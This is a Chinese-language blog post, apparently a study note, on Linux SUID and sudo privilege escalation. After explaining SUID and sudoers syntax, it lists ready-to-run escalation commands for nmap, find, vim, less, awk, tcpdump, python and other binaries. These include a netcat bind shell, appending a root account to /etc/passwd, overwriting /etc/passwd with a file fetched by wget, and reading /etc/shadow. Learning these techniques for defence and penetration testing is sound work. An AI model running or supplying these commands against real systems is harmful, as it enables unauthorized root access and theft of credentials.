<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/Str3am.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/Str3am.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Damion:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('https://jlkl.github.io').hostname,
    root: '/',
    scheme: 'Gemini',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: true,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="0x00 前言面试时发现关于 SUID 并不是很清楚，所以学习记录下 0x01 关于 SUIDSUID（设置用户ID）是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。 那么，为什么要给Linux二进制文件设置这种权限呢？其实原因有很多，例如，程序ping需要root权限才能打开网络套接字，但执行该程序的用户通常都是由普通">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux SUID 提权">
<meta property="og:url" content="https://jlkl.github.io/2020/01/27/Web_15/index.html">
<meta property="og:site_name" content="Str3am&#39;s Blog">
<meta property="og:description" content="0x00 前言面试时发现关于 SUID 并不是很清楚，所以学习记录下 0x01 关于 SUIDSUID（设置用户ID）是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。 那么，为什么要给Linux二进制文件设置这种权限呢？其实原因有很多，例如，程序ping需要root权限才能打开网络套接字，但执行该程序的用户通常都是由普通">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://jlkl.github.io/2020/01/27/Web_15/20200127144036.png">
<meta property="og:image" content="https://jlkl.github.io/2020/01/27/Web_15/20200127151310.png">
<meta property="og:image" content="https://jlkl.github.io/2020/01/27/Web_15/20200127154030.png">
<meta property="article:published_time" content="2020-01-27T08:59:01.000Z">
<meta property="article:modified_time" content="2020-01-27T09:06:20.000Z">
<meta property="article:author" content="Str3am">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jlkl.github.io/2020/01/27/Web_15/20200127144036.png">

<link rel="canonical" href="https://jlkl.github.io/2020/01/27/Web_15/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>Linux SUID 提权 | Str3am's Blog</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?fcdffc3f3c9531fca765ea966be04985";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Str3am's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Str3am's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags<span class="badge">15</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives<span class="badge">40</span></a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://jlkl.github.io/2020/01/27/Web_15/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Str3am.jpg">
      <meta itemprop="name" content="Str3am">
      <meta itemprop="description" content="这个人很懒，什么也没留下">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Str3am's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Linux SUID 提权
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-01-27 16:59:01 / Modified: 17:06:20" itemprop="dateCreated datePublished" datetime="2020-01-27T16:59:01+08:00">2020-01-27</time>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/01/27/Web_15/#comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/01/27/Web_15/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
              <span>2.5k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
              <span>3 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>面试时发现关于 SUID 并不是很清楚，所以学习记录下</p>
<h2 id="0x01-关于-SUID"><a href="#0x01-关于-SUID" class="headerlink" title="0x01 关于 SUID"></a>0x01 关于 SUID</h2><p>SUID（设置用户ID）是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。</p>
<p>那么，为什么要给Linux二进制文件设置这种权限呢？其实原因有很多，例如，程序ping需要root权限才能打开网络套接字，但执行该程序的用户通常都是由普通用户，来验证与其他主机的连通性。</p>
<a id="more"></a>

<p>但是，如果某些现有的二进制文件和实用程序具有SUID权限的话，就可以在执行时将权限提升为root。</p>
<p>如 <code>passwd</code> 的权限：</p>
<p><img src="/2020/01/27/Web_15/20200127144036.png" alt></p>
<p>用户可以输入自己的密码或者不需要密码在root权限下执行命令，这可在设置文件 <code>/etc/sudoers</code> 中配置。</p>
<h3 id="1-1-etc-sudoers-语法"><a href="#1-1-etc-sudoers-语法" class="headerlink" title="1.1 /etc/sudoers 语法"></a>1.1 /etc/sudoers 语法</h3><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root <span class="keyword">ALL</span>=(<span class="keyword">ALL</span>) <span class="keyword">ALL</span></span><br></pre></td></tr></table></figure>
<p>root 用户可以从 ALL（任何）终端执行，充当ALL（任何）用户，并运行ALL（任何）命令。第一部分指定用户，第二部分指定可充当用户，第三部分指定 <code>sudo</code> 可运行的命令。</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">touhid <span class="keyword">ALL</span>= /sbin/poweroff</span><br></pre></td></tr></table></figure>
<p>输入 touchid 的密码，可以 sudo 执行 poweroff 命令。</p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">touhid ALL = (root) <span class="string">NOPASSWD:</span> <span class="regexp">/usr/</span>bin/find</span><br></pre></td></tr></table></figure>
<p>不输入密码,可以 sudo 执行 find 命令</p>
<h3 id="1-2-查找具有-SUID-权限位文件"><a href="#1-2-查找具有-SUID-权限位文件" class="headerlink" title="1.2 查找具有 SUID 权限位文件"></a>1.2 查找具有 SUID 权限位文件</h3><p>以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说，这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="builtin-name">find</span> / -user root -perm -4000 -<span class="builtin-name">print</span> 2&gt;/dev/<span class="literal">null</span></span><br><span class="line"><span class="builtin-name">find</span> / -perm <span class="attribute">-u</span>=s -type f 2&gt;/dev/<span class="literal">null</span></span><br><span class="line"><span class="builtin-name">find</span> / -user root -perm -4000 -exec ls -ldb &#123;&#125; ;</span><br></pre></td></tr></table></figure>
<p>也可以使用 <code>sudo -l</code> 命令列出当前用户可执行的命令</p>
<p><img src="/2020/01/27/Web_15/20200127151310.png" alt></p>
<h2 id="0x02-常用提权方式"><a href="#0x02-常用提权方式" class="headerlink" title="0x02 常用提权方式"></a>0x02 常用提权方式</h2><h3 id="2-1-nmap"><a href="#2-1-nmap" class="headerlink" title="2.1 nmap"></a>2.1 nmap</h3><p>nmap（2.02-5.21）存在交换模式，可利用提权</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap <span class="comment">--interactive</span></span><br></pre></td></tr></table></figure>
<p>之后执行:</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap&gt; !<span class="keyword">sh</span></span><br><span class="line"><span class="keyword">sh-3.2# </span>whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure>
<p>msf中的模块为：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/unix/<span class="keyword">local</span>/setuid_nmap</span><br></pre></td></tr></table></figure>
<p>较新版可使用 <code>--script</code> 参数：</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="string">"os.execute('/bin/sh')"</span> &gt; /tmp/<span class="keyword">shell</span>.nse &amp;&amp; sudo <span class="keyword">nmap</span> --script=/tmp/<span class="keyword">shell</span>.nse</span><br></pre></td></tr></table></figure>
<p>kali nmap 7.7 提权成功：</p>
<p><img src="/2020/01/27/Web_15/20200127154030.png" alt></p>
<h3 id="2-2-find"><a href="#2-2-find" class="headerlink" title="2.2 find"></a>2.2 find</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch <span class="built_in">test</span></span><br><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> whoami \;</span><br></pre></td></tr></table></figure>
<p>nc 反弹 shell：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> netcat -lvp 5555 -e /bin/sh \;</span><br></pre></td></tr></table></figure>
<h3 id="2-3-vi-vim"><a href="#2-3-vi-vim" class="headerlink" title="2.3 vi/vim"></a>2.3 vi/vim</h3><p>打开vim,按下ESC</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">:set <span class="keyword">shell</span><span class="bash">=/bin/sh</span></span><br><span class="line">:<span class="keyword">shell</span></span><br></pre></td></tr></table></figure>
<p>或者</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim -<span class="keyword">c</span> '<span class="title">!sh</span>'</span><br></pre></td></tr></table></figure>
<h3 id="2-4-bash"><a href="#2-4-bash" class="headerlink" title="2.4 bash"></a>2.4 bash</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bash -p</span><br><span class="line">bash-3.2# id</span><br><span class="line"><span class="attribute">uid</span>=1002(service) <span class="attribute">gid</span>=1002(service) <span class="attribute">euid</span>=0(root) <span class="attribute">groups</span>=1002(service)</span><br></pre></td></tr></table></figure>
<h3 id="2-5-less"><a href="#2-5-less" class="headerlink" title="2.5 less"></a>2.5 less</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">less <span class="regexp">/etc/</span>passwd</span><br><span class="line">!<span class="regexp">/bin/</span>sh</span><br></pre></td></tr></table></figure>
<h3 id="2-6-more"><a href="#2-6-more" class="headerlink" title="2.6 more"></a>2.6 more</h3><figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">more <span class="meta-keyword">/home/</span>pelle/myfile</span><br><span class="line">!<span class="meta-keyword">/bin/</span>bash</span><br></pre></td></tr></table></figure>
<h3 id="2-7-cp"><a href="#2-7-cp" class="headerlink" title="2.7 cp"></a>2.7 cp</h3><p>覆盖 <code>/etc/shadow</code> 或 <code>/etc/passwd</code></p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[<span class="symbol">zabbix@</span>localhost ~]$ cat /etc/passwd &gt;passwd</span><br><span class="line"><span class="number">2.</span>[<span class="symbol">zabbix@</span>localhost ~]$ openssl passwd <span class="number">-1</span> -salt hack hack123</span><br><span class="line"><span class="number">3.</span>$<span class="number">1</span>$hack$WTn0dk2QjNeKfl.DHOUue0</span><br><span class="line"><span class="number">4.</span>[<span class="symbol">zabbix@</span>localhost ~]$ echo <span class="string">'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash'</span> &gt;&gt; passwd</span><br><span class="line"><span class="number">5.</span>[<span class="symbol">zabbix@</span>localhost ~]$ cp passwd /etc/passwd</span><br><span class="line"><span class="number">6.</span>[<span class="symbol">zabbix@</span>localhost ~]$ su - hack</span><br><span class="line"><span class="number">7.</span>Password:</span><br><span class="line"><span class="number">8.</span>[<span class="symbol">root@</span><span class="number">361</span>way ~]# id</span><br><span class="line"><span class="number">9.</span>uid=<span class="number">0</span>(hack) gid=<span class="number">0</span>(root) groups=<span class="number">0</span>(root)</span><br><span class="line"><span class="number">10.</span>[<span class="symbol">root@</span><span class="number">361</span>way ~]# cat /etc/passwd|tail <span class="number">-1</span></span><br><span class="line"><span class="number">11.</span>hack:$<span class="number">1</span>$hack$WTn0dk2QjNeKfl.DHOUue0:<span class="number">0</span>:<span class="number">0</span>::/root/:/bin/bash</span><br></pre></td></tr></table></figure>
<h3 id="2-8-mv"><a href="#2-8-mv" class="headerlink" title="2.8 mv"></a>2.8 mv</h3><p>覆盖 <code>/etc/shadow</code> 或 <code>/etc/passwd</code></p>
<h3 id="2-9-nano"><a href="#2-9-nano" class="headerlink" title="2.9 nano"></a>2.9 nano</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nano  <span class="regexp">/etc/</span>passwd</span><br></pre></td></tr></table></figure>
<h3 id="2-10-awk"><a href="#2-10-awk" class="headerlink" title="2.10 awk"></a>2.10 awk</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk '<span class="keyword">BEGIN</span> &#123;<span class="keyword">system</span>(<span class="string">"/bin/sh"</span>)&#125;<span class="string">'</span></span><br></pre></td></tr></table></figure>
<h3 id="2-11-man"><a href="#2-11-man" class="headerlink" title="2.11 man"></a>2.11 man</h3><figure class="highlight properties"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">man</span> <span class="string">passwd</span></span><br><span class="line"><span class="comment">!/bin/bash</span></span><br></pre></td></tr></table></figure>
<h3 id="2-12-wget"><a href="#2-12-wget" class="headerlink" title="2.12 wget"></a>2.12 wget</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">56.1</span>:<span class="number">8080</span><span class="regexp">/passwd -O /</span>etc<span class="regexp">/passwd</span></span><br></pre></td></tr></table></figure>
<h3 id="2-13-apache"><a href="#2-13-apache" class="headerlink" title="2.13 apache"></a>2.13 apache</h3><p>仅可查看文件，不能弹 shell：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apache2 -f <span class="regexp">/etc/</span>shadow</span><br></pre></td></tr></table></figure>
<h3 id="2-14-tcpdump"><a href="#2-14-tcpdump" class="headerlink" title="2.14 tcpdump"></a>2.14 tcpdump</h3><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">echo $<span class="string">'id\ncat /etc/shadow'</span> &gt; <span class="regexp">/tmp/</span>.test</span><br><span class="line">chmod +x <span class="regexp">/tmp/</span>.test</span><br><span class="line">sudo tcpdump -ln -i eth0 -w <span class="regexp">/dev/</span><span class="keyword">null</span> -W <span class="number">1</span> -G <span class="number">1</span> -z <span class="regexp">/tmp/</span>.test -Z root</span><br></pre></td></tr></table></figure>
<h3 id="2-15-python-perl-ruby-lua-php-etc"><a href="#2-15-python-perl-ruby-lua-php-etc" class="headerlink" title="2.15 python/perl/ruby/lua/php/etc"></a>2.15 python/perl/ruby/lua/php/etc</h3><p>python</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -<span class="keyword">c</span> <span class="string">"import os;os.system('/bin/bash')"</span></span><br></pre></td></tr></table></figure>

<p>perl</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec <span class="string">"/bin/bash"</span><span class="comment">;</span></span><br></pre></td></tr></table></figure>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><ul>
<li><a href="https://touhidshaikh.com/blog/?p=790" target="_blank" rel="noopener">Abusing SUDO (Linux Privilege Escalation)</a></li>
<li><a href="https://www.anquanke.com/post/id/86979" target="_blank" rel="noopener">【安全科普】Linux提权——利用可执行文件SUID</a></li>
<li><a href="https://www.jianshu.com/p/e6c4c4bdf7c3" target="_blank" rel="noopener">linux特殊权限SUID、SGID、SBIT</a></li>
<li><a href="http://101.200.63.12/index.php/archives/521/" target="_blank" rel="noopener">SUID 提权 - CoColi丶</a></li>
<li><a href="https://evi1cg.me/archives/SUID_Privilege_Escalation.html" target="_blank" rel="noopener">SUID Privilege Escalation - Evi1cg</a></li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Str3am
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://jlkl.github.io/2020/01/27/Web_15/" title="Linux SUID 提权">https://jlkl.github.io/2020/01/27/Web_15/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># Web</a>
              <a href="/tags/Linux/" rel="tag"># Linux</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/01/26/C_C++_02/" rel="prev" title="C语言经典例题整理">
      <i class="fa fa-chevron-left"></i> C语言经典例题整理
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/23/Java_01/" rel="next" title="Java 基础">
      Java 基础 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-关于-SUID"><span class="nav-number">2.</span> <span class="nav-text">0x01 关于 SUID</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-etc-sudoers-语法"><span class="nav-number">2.1.</span> <span class="nav-text">1.1 &#x2F;etc&#x2F;sudoers 语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-查找具有-SUID-权限位文件"><span class="nav-number">2.2.</span> <span class="nav-text">1.2 查找具有 SUID 权限位文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-常用提权方式"><span class="nav-number">3.</span> <span class="nav-text">0x02 常用提权方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-nmap"><span class="nav-number">3.1.</span> <span class="nav-text">2.1 nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-find"><span class="nav-number">3.2.</span> <span class="nav-text">2.2 find</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-vi-vim"><span class="nav-number">3.3.</span> <span class="nav-text">2.3 vi&#x2F;vim</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-4-bash"><span class="nav-number">3.4.</span> <span class="nav-text">2.4 bash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-5-less"><span class="nav-number">3.5.</span> <span class="nav-text">2.5 less</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-6-more"><span class="nav-number">3.6.</span> <span class="nav-text">2.6 more</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-7-cp"><span class="nav-number">3.7.</span> <span class="nav-text">2.7 cp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-8-mv"><span class="nav-number">3.8.</span> <span class="nav-text">2.8 mv</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-9-nano"><span class="nav-number">3.9.</span> <span class="nav-text">2.9 nano</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-10-awk"><span class="nav-number">3.10.</span> <span class="nav-text">2.10 awk</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-11-man"><span class="nav-number">3.11.</span> <span class="nav-text">2.11 man</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-12-wget"><span class="nav-number">3.12.</span> <span class="nav-text">2.12 wget</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-13-apache"><span class="nav-number">3.13.</span> <span class="nav-text">2.13 apache</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-14-tcpdump"><span class="nav-number">3.14.</span> <span class="nav-text">2.14 tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-15-python-perl-ruby-lua-php-etc"><span class="nav-number">3.15.</span> <span class="nav-text">2.15 python&#x2F;perl&#x2F;ruby&#x2F;lua&#x2F;php&#x2F;etc</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">4.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Str3am"
      src="/images/Str3am.jpg">
  <p class="site-author-name" itemprop="name">Str3am</p>
  <div class="site-description" itemprop="description">这个人很懒，什么也没留下</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">40</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/jlkl" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;jlkl" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:str3am@qq.com" title="E-Mail → mailto:str3am@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml"><i class="fa fa-fw fa-rss"></i>RSS</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Friends
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://0xmj.github.io/" title="http:&#x2F;&#x2F;0xmj.github.io&#x2F;" rel="noopener" target="_blank">Mang0</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/sn1per/" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;sn1per&#x2F;" rel="noopener" target="_blank">Sn1per</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.siriyang.cn/" title="https:&#x2F;&#x2F;blog.siriyang.cn&#x2F;" rel="noopener" target="_blank">Siriyang</a>
        </li>
    </ul>
